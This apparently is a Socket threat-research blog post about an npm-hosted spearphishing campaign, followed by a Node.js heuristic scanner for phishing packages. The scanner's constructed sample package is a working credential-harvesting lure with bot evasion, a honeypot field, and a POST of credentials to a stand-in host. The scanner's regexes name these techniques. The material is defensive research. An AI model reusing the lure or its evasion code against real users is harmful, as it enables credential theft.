Spearphishing Campaign Abuses npm Registry to Target U.S. and Allied Manufacturing and Healthcare Organizations
Blog post from Socket
The Socket Threat Research Team uncovered a targeted phishing campaign that abuses the npm registry to host and distribute malicious packages. The packages mimic secure document-sharing workflows and Microsoft sign-in pages, and the lures are aimed at sales and commercial personnel in critical infrastructure sectors across the U.S. and allied nations. Over five months, 27 malicious npm packages were identified. All of them carry browser-executed phishing components with client-side defenses intended to frustrate analysis, and all of them redirect victims to threat actor-controlled infrastructure for credential harvesting.

The operation is distinct from earlier campaigns such as Beamglea: it uses npm as a hosting platform for self-contained phishing flows that rewrite page content with embedded HTML and JavaScript, and it incorporates anti-analysis measures such as bot detection and honeypot form fields.

The targeting focuses on individuals in manufacturing, industrial automation, and healthcare, who may have been identified through trade show directories and other publicly available information. The campaign leverages adversary-in-the-middle (AiTM) infrastructure to capture session cookies after the victim authenticates, which defeats MFA factors that are not bound to the origin (one-time codes, push approvals); phishing-resistant authenticators such as FIDO2/WebAuthn resist this pattern because the signed assertion is tied to the legitimate origin.

The Socket team reported the activity to npm security and notified the affected organizations to support triage and mitigation. It recommends enhanced monitoring and security measures, since npm-hosted phishing infrastructure is a persistent threat.
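As an added example (this is not Socket's tooling and not code from the campaign), the following Node.js script applies a heuristic triage to the files of an extracted npm package, looking for the techniques the summary names: client-side page rewriting, bot detection, honeypot fields, Microsoft sign-in lures, and redirects or credential POSTs to external hosts. The indicator regexes, weights, threshold, package names, and domains are assumptions constructed for illustration; the two sample packages are constructed inputs, not real packages.

```javascript
// Heuristic triage for npm packages that ship a browser-executed phishing page.
// Added example, not Socket's tooling. The indicator list, weights and threshold
// are assumptions drawn from the techniques the summary names: client-side page
// rewriting, bot detection, honeypot fields, Microsoft sign-in lures, and
// redirect or exfiltration to attacker-controlled hosts.

const INDICATORS = [
  { id: "page-rewrite", weight: 2,
    // the package's script replaces the live document with embedded HTML
    re: /document\.(write|writeln)\s*\(|document\.(body|documentElement)\.innerHTML\s*=/ },
  { id: "bot-detection", weight: 2,
    // automation and headless-browser fingerprints checked before rendering the lure
    re: /navigator\.webdriver|HeadlessChrome|callPhantom|__nightmare|__selenium_unwrapped/ },
  { id: "honeypot-field", weight: 3,
    // an input humans never see (hidden or pushed off-screen) that bots fill in
    re: /<input\b[^>]*style=["'][^"']*(display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0|left\s*:\s*-\d{3,}px)[^"']*["'][^>]*>/i },
  { id: "ms-signin-lure", weight: 2,
    re: /sign in to your (microsoft )?account|login\.microsoftonline\.com|office ?365|sharepoint|onedrive/i },
  { id: "password-field", weight: 1,
    re: /<input\b[^>]*type=["']password["']/i },
  { id: "external-redirect", weight: 2,
    re: /location(\.href)?\s*=\s*["']https?:\/\/|location\.(replace|assign)\s*\(\s*["']https?:\/\// },
  { id: "credential-exfil", weight: 3,
    // form data POSTed to an absolute URL, i.e. off the page's own origin
    re: /fetch\(\s*["']https?:\/\/[^"']+["']\s*,\s*\{[^}]*method\s*:\s*["']POST["']/ },
];

const SUSPICIOUS_SCORE = 6; // assumed threshold: two strong or three weak indicators

function scanFile(path, content) {
  // only HTML and script files can carry the browser-executed flow
  if (!/\.(html?|m?js|cjs)$/i.test(path)) return [];
  return INDICATORS.filter((ind) => ind.re.test(content))
    .map((ind) => ({ file: path, id: ind.id, weight: ind.weight }));
}

function scanPackage(files) {
  const hits = Object.entries(files).flatMap(([path, content]) => scanFile(path, content));
  // score each indicator once per package so duplicated files do not inflate it
  const byId = new Map();
  for (const h of hits) if (!byId.has(h.id)) byId.set(h.id, h);
  const score = [...byId.values()].reduce((sum, h) => sum + h.weight, 0);
  return {
    score,
    indicators: [...byId.keys()].sort(),
    suspicious: score >= SUSPICIOUS_SCORE,
    hits,
  };
}

// Constructed sample packages for the demo; neither is a real npm package and the
// domains are RFC 2606 reserved names, not campaign infrastructure.
const BENIGN_PACKAGE = {
  "package.json": '{ "name": "tiny-slug", "version": "1.0.0", "main": "index.js" }',
  "index.js": "module.exports = (s) => s.toLowerCase().trim().replace(/[^a-z0-9]+/g, '-');\n",
  "README.md": "# tiny-slug\nTurns a title into a URL slug.\n",
};

const PHISHING_PACKAGE = {
  "package.json": '{ "name": "secure-doc-viewer", "version": "2.1.0" }',
  "index.html": [
    "<!doctype html>",
    "<title>Secure Document Share</title>",
    "<script>",
    "  // bounce automation and sandboxes to a harmless page before the lure renders",
    "  if (navigator.webdriver || /HeadlessChrome/.test(navigator.userAgent)) {",
    "    location.replace('https://www.example.com/');",
    "  }",
    "  document.body.innerHTML =",
    "    '<h2>Sign in to your account to view the shared document</h2>' +",
    "    '<form id=\"f\">' +",
    "    '<input name=\"email\" type=\"email\">' +",
    "    '<input name=\"password\" type=\"password\">' +",
    "    '<input name=\"fax\" type=\"text\" style=\"position:absolute;left:-9999px\">' +",
    "    '<button>Sign in</button></form>';",
    "  document.getElementById('f').onsubmit = (e) => {",
    "    e.preventDefault();",
    "    if (e.target.fax.value) return; // a bot filled the honeypot: drop silently",
    "    fetch('https://collector.phish.example/login', { method: 'POST', body: new FormData(e.target) });",
    "  };",
    "</script>",
  ].join("\n"),
};

console.log(scanPackage(PHISHING_PACKAGE));
```

To run it against a real package, fetch the tarball with `npm pack <name>`, extract it, and read each file into the `files` object keyed by path. Treat the verdict as a triage signal rather than proof: legitimate sites also use password fields and hidden inputs, which is why a single indicator never crosses the threshold on its own and why the lure text, bot check, and off-origin POST are weighted above the generic form markup.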